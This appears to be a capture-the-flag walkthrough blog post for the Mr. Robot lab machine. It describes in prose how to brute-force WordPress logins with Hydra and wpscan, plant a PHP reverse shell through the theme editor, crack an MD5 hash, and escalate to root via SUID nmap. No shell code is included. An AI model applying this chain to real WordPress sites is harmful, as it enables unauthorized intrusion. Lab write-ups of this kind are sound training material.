Start by checking for the robots.txt file. Notice, a path to one of the flags is included and a dict file is listed.
Lets use “wget” to grab both of these files listed in the robots.txt.
Output the contents of “key-1-of-3.txt” to get the first FLAG.
Use “less” to view the contents of fsocity.dic and notice that this is a wordlist that can be used in further dictionary attacks.
Attempt to discover a valid username. Notice that there is an error for “Invalid username” when you enter a username which does not exist. Test against this by providing Hydra with the “fsocity.dic” wordlist for the username parameter.
The username “Elliot” is discovered to be a valid username using Hydra.
Lets use wpscan to perform a dictionary attack for the user “elliot”. Based on trial and error (time) I decided to reverse the “fsocity.dic” dictionary.
The password was discovered in 3 seconds. After logging into the WordPress Blog, note that there is another user account (subscriber). Use “wpscan” to dictionary attack this account as well.
There was nothing of any further value found by cracking the second WordPress account.
The “Elliot” account is an administrative account for this WordPress blog. We can edit blog files with this account allowing us to put a PHP reverse shell or PHP backdoor on the blog. We will use this reverse shell:
Start by populating the “Archives” page on the blog. Select and publish the “Hello World” post from the “Posts” tab on the sidebar. Once this has been activated, browse to the “Theme Editor” located under the Appearance tab of the Dashboard sidebar. Choose to edit the “Archives” file and copy-paste the reverse shell into the top of the document.
Note that you will need to change two values at the start of the shell. Set the “ip” value to that of your attack machine. Set the “port” value to the port you’d like to the PHP backdoor to connect to. You will be using netcat to listen for the connection from your attack machine on that specified port.
Browse to the “archives” page and select a month to load the backdoor.
Let’s start by getting a “bash” prompt.
Let’s browse the file system for another flag.
With our limited privileges we will need to elevate privileges to continue. Notice that there is a “password.raw-md5” file contained in the /home/robot directory which can be displayed.
Crack this using hashcat.
The password was not contained within the fsocity.dic wordlist file. Use “rockyou.txt” for this.
The password should be quickly found.
Use this password to switch user (su) from the PHP backdoor daemon account.
Display the contents of the FLAG file found in the “robot” user home directory.
We are going to look for suid files to escalate privileges to access “/root”.
nmap in interactive mode can be used.
Latest posts by Jesse Shelley (see all)